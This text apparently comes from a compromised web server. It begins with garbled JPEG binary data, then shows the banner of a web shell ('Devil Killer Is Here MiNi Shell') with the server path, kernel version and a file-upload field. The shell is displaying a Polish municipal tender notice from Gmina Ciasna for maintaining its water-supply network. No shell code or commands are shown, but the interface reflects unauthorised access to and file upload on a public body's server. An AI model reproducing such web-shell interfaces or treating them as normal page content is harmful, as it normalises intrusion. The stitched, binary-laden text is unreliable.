JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211217/0032049501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżące utrzymanie sieci oraz urządzeń wodociągowych służących do zbiorowego zaopatrzenia w wodę w Gminie Ciasna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CIASNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398416</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowa 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciasna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-793</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 3535100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ciasna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ciasna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie sieci oraz urządzeń wodociągowych służących do zbiorowego zaopatrzenia w wodę w Gminie Ciasna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-14b7a842-5f22-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00320495</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Art. 68.<br/>Przekazywanie ofert, wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>lub w konkursie, wniosków, o których mowa w art. 371 ust. 3, oraz prac konkursowych odbywa się przy<br/>użyciu środków komunikacji elektronicznej, zapewniających zachowanie integralności, autentyczności,<br/>nienaruszalności danych i ich poufności w ramach wymiany i przechowywania informacji, w tym<br/>zapewniających możliwość zapoznania się z ich treścią wyłącznie po upływie terminu na ich<br/>składanie.1. Komunikacja między zamawiającym a wykonawcą.1.1 JOSEPHINE to aplikacja<br/>internetowa znajdująca się na domenie https://josephine.proebiz.com, która jest przeznaczona do<br/>elektronicznej komunikacji między zamawiającym a wykonawcą w rozumieniu ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (Dz.U.2019.2019 z dnia 2019.10.24 z późniejszymi<br/>zmianami).1.2 Zamawiający będzie komunikował się z wykonawcami za pośrednictwem modułu<br/>komunikacyjnego systemu JOSEPHINE. Złożenie oferty, złożenie wniosku o dopuszczenie do udziału,<br/>złożenie wniosku o wyjaśnienie dokumentacji przetargowej, uzupełnienie kwalifikacji, wyjaśnienie ofert,<br/>zgłaszanie sprzeciwu, nastąpi pomiędzy zainteresowaną stroną (zwana dalej „wykonawcą”) i<br/>zamawiającym wyłącznie drogą elektroniczną w języku polskim oraz w sposób gwarantujący<br/>kompletność danych zawartych we wszystkich dokumentach, w tym ochronę danych poufnych i<br/>osobowych. Ta metoda komunikacji dotyczy wszelkiej komunikacji elektronicznej między<br/>Ogłoszenie nr 2021/BZP 00023793/01 z dnia 2021-03-26<br/>2021-03-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>zamawiającym a wykonawcą, w tym komunikacji w dynamicznym systemie zakupów (zwanym dalej<br/>„DSZ”).1.3 Aby bezproblemowo korzystać z systemu JOSEPHINE, konieczne jest korzystanie z<br/>komputera podłączonego do internetu i przeglądarki internetowej. Szczegółowe informacje dotyczące<br/>wymagań technicznych znajdują się pod adresem<br/>https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdfOferta musi<br/>być sporządzona pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Wszystkie oświadczenia i dokumenty składane wraz z<br/>ofertą muszą być sporządzone w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym (formie elektronicznej) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.Uszczegółowienie i pozostałe ustalenia odnośnie wymagań technicznych i<br/>organizacyjnych dot. korespondencji elektronicznej zawarte są w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 z późniejszymi zmianami), dalej „RODO”, informuję, że: <br/>- W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy na: „Bieżące utrzymanie sieci oraz urządzeń wodociągowych służących do zbiorowego zaopatrzenia w wodę w Gminie Ciasna” Pani/Pana danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych.<br/>- Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi przepis prawa Pani/Pan dane mogą być przetwarzane w sposób zautomatyzowany <br/>i nie będą profilowane.<br/> administratorem Pani/Pana danych osobowych jest Urząd Gminy Ciasna<br/> w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem Ochrony Danych pod adresem e-mail: aleksandra@eduodo.pl lub iod@eduodo.pl;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/ prowadzonym w trybie przetargu nieograniczonego;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej „ustawa Pzp”; <br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia składania ofert a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą ww przedział czasowy, okres przechowywania obejmuje ten termin; <br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ID.271.15.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest wykonywanie bieżącego utrzymania sieci<br/>wodociągowej oraz wszelkich innych urządzeń składających się na tę sieć i obejmujących:<br/>1) dokonywanie uzgodnień technicznych z właścicielami innych urządzeń na sieci,<br/>2) kontrolowanie prawidłowości wykonanych połączeń domowych z siecią,<br/>3) reagowanie na stwierdzone nielegalne podłączenia do sieci wodociągowej, nielegalny pobór<br/>wody i prowadzenie działań w celu jego eliminowania (ściśle we współpracy z Zamawiającym),<br/>4) zabezpieczenie i oznakowanie miejsc awarii na sieci,<br/>5) sprawdzenie przyczyn nieprawidłowości działania urządzeń lub sieci po otrzymaniu<br/>wiadomości SMS, bądź zgłoszeniu telefonicznym w ramach prowadzenia całodobowego<br/>monitoringu<br/>6) dokonywanie przeglądów technicznych stacji ujęcia wody w Przywarach oraz hydroforni w<br/>Glinicy w celu zapewnienia nieprzerwanych dostaw wody,<br/>7) nie rzadziej niż raz w miesiącu sprawdzenie pracy pomp,<br/>8) nie rzadziej niż raz w miesiącu sprawdzenie systemów sterowania i sygnalizacji,<br/>9) nie rzadziej niż raz w miesiącu konserwacja urządzeń instalacji elektrycznej stacji - przegląd<br/>urządzeń instalacji elektrycznych, aby nie spowodować przerwy w dostawie zasilania z powodu<br/>np. awarii,<br/>10) prowadzenie badania wody na sieciach i ujęciach zgodnie z obowiązującymi przepisami, po<br/>wystąpieniu awarii mogącej spowodować skażenie wody, bądź podejrzeniu wystąpienia<br/>skażenia wody,<br/>11) prowadzenie wymaganych przepisami książek obiektów i ewidencji urządzeń,<br/>12) w zakresie bieżącego utrzymania stacji SUW:<br/>- dozór techniczny obiektów i urządzeń,<br/>- bieżącą konserwacja urządzeń technologicznych,<br/>- całodobowy monitoring,<br/>13) dokonywanie wymiany, montażu, plombowanie wodomierzy oraz wystawienie „karty<br/>zabudowy”,<br/>14) dokonywanie odczytów wodomierzy zamontowanych w studniach wodomierzowych z uwagi<br/>na ograniczony dostęp raz na dwa miesiące<br/>15) reagowania na zgłoszenia dotyczące awarii sieci wodociągowej poprzez niezwłoczne<br/>stawienie sie na miejscu awarii i podjęcie działań techniczno – organizacyjnych, aby przyczyny<br/>awarii wyeliminować oraz ograniczyć jej skutki.<br/>16) w ramach prowadzenia bieżącego utrzymania Wykonawca zobowiązany będzie w każdym<br/>roku obowiązywania umowy wykonać 10 szt. przyłączy wodociągowych w miejscach<br/>wskazanych przez Zmawiającego. Powyższe dotyczyć może zarówno wymiany istniejącego<br/>przyłącza jak i wykonanie przyłącza nowego. Koszt materiału przeznaczony na wykonanie<br/>przyłączy podlegał będzie zwrotowi na zasadzie zgodnej z punktem nr 2.2 poniżej. Jako<br/>przyłącze wodociągowe rozumieć należy odcinek od sieci głównej do studni wodomierzowej<br/>(włącznie) zlokalizowanej na terenie odbiorcy. Zakończeniem przyłącza będzie studnia<br/>wodomierzowa (z kompletnym wyposażeniem).<br/>2.2 Materiały eksploatacyjne niezbędne do wykonywania obowiązków wynikających z pełnienia<br/>funkcji eksploatatora sieci wyszczególnionych w pkt 2.1 dostarczane będą przez Wykonawcę, ze<br/>zwrotem poniesionych kosztów za ich zakup przez Zamawiającego na podstawie<br/>comiesięcznego rozliczenia (zestawienia tabelarycznego) wraz z kopiami faktur na zakupiony<br/>materiał.<br/>2.3 W ramach obowiązków Wykonawcy będzie eksploatacja sieci wodociągowej o łącznej<br/>długości około 159 km wraz z stacją uzdatniania wody oraz ujęciami wodnymi na terenie<br/>miejscowości Sieraków Śląski oraz znajdującej się trakcie budowy stacji ujęcia wody w Łomnicy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">65000000-3 - Obiekty użyteczności publicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65100000-4 - Usługi przesyłu wody i podobne</p> <p class="mb-0">65110000-7 - Przesył wody</p> <p class="mb-0">65111000-4 - Przesył wody pitnej</p> <p class="mb-0">65130000-3 - Obsługa stacji wody</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami:<br/>1) cena waga ( Kc ): 60%<br/>2) czas reakcji w przypadku wystąpienia awarii na sieci ( KA ): 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji w razie wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym oraz uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający opisuje warunku udziału.<br/>2) Zdolność techniczna lub zawodowa<br/>a) Wiedza i doświadczenie.<br/>Wykonawca spełni warunek , jeżeli wykaże, że wykonał (bądź wykonuje) w okresie ostatnich<br/>trzech lat, a jeżeli okres prowadzenia jego działalności jest krótszy, w tym okresie, co najmniej<br/>jedną usługę polegająca na administrowaniu i bieżącym utrzymaniu (pełnienie funkcji<br/>eksploatatora sieci wodociągowej w zakresie zbieżnym z wymaganiami postawionymi w<br/>niniejszej specyfikacji) sieci wodociągowej o łącznej długości min. 100 km. Warunek zostanie<br/>spełniony, jeżeli Wykonawca wykaże, że pełnił w/w usługę nieprzerwanie przez okres min. 2 lat.<br/>Dodatkowo wymaga się aby Wykonawca wykazał, że w w/w okresie nie doszło do<br/>zanieczyszczenia (skażenia) wody sieciowej w administrowanej przez Wykonawcę sieci<br/>wodociągowej.<br/>Warunek ten ma spełniać samodzielnie Wykonawca lub samodzielnie jeden z konsorcjantów lub<br/>samodzielnie jeden podmiot udostępniający zasoby wiedzy i doświadczenia - doświadczenie<br/>w/w podmiotów nie sumuje się. Warunek braku zanieczyszczenia (skażenia) wody sieciowej<br/>dotyczy każdego z konsorcjantów osobno.<br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego<br/>oferta zostanie oceniona zostanie wezwany do złożenia wykazu potwierdzającego spełnienie<br/>tego warunku udziału w postępowaniu – wg Załącznika nr 6 SWZ.<br/>2) Zdolność techniczna lub zawodowa – cd.<br/>b) Warunek dysponowania osobami – minimalny zakres kwalifikacji i doświadczenia wymagany<br/>od osób skierowanych do realizacji zamówienia.<br/>Zamawiający nie dokonuje określenia sposobu spełniania warunku.<br/>2) Zdolność techniczna lub zawodowa – cd.<br/>c) Wykonawca musi dysponować przez cały okres realizacji zamówienia następującym<br/>potencjałem<br/>technicznym:<br/>Zamawiający nie dokonuje określenia sposobu spełniania warunku.<br/>3) Sytuacji ekonomicznej lub finansowej<br/>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że :<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną tego ubezpieczenia nie mniejszą<br/>niż 100 000,00 PLN<br/>Zamawiający nie wprowadza w tym zakresie żadnych wzorów. Dokumenty składane w<br/>zależności od rodzaju składanego dokumentu (dokumentów). Dopuszczalne jest sumowanie i<br/>łączenie przez wykonawcę / wykonawców składających ofertę wspólną czy podmiot<br/>udostępniający zasoby.<br/>Na wezwanie zamawiającego (art. 274 ust. 1), po terminie składania ofert wykonawca, którego<br/>oferta zostanie oceniona zostanie wezwany do złożenia wykazu potwierdzającego spełnienie<br/>tego warunku udziału w postępowaniu.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub<br/>kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający żąda,<br/>następujących podmiotowych środków dowodowych:<br/>1) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze<br/>wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez<br/>zamawiającego podmiotowych środków dowodowych, o których mowa w ppkt 1), wykonawca<br/>składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają<br/>spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu lub kryterium<br/>selekcji dotyczącego sytuacji ekonomicznej lub finansowej.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie<br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.<br/>Pozostałe ustalenia dot. warunków udziału w<br/>postępowaniu zawarte są w rozdziale V SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W trakcie procedury badania i oceny ofert na podstawie art. 274 ust 1 ustawy pzp Wykonawca, którego<br/>oferta zostanie najwyżej oceniona 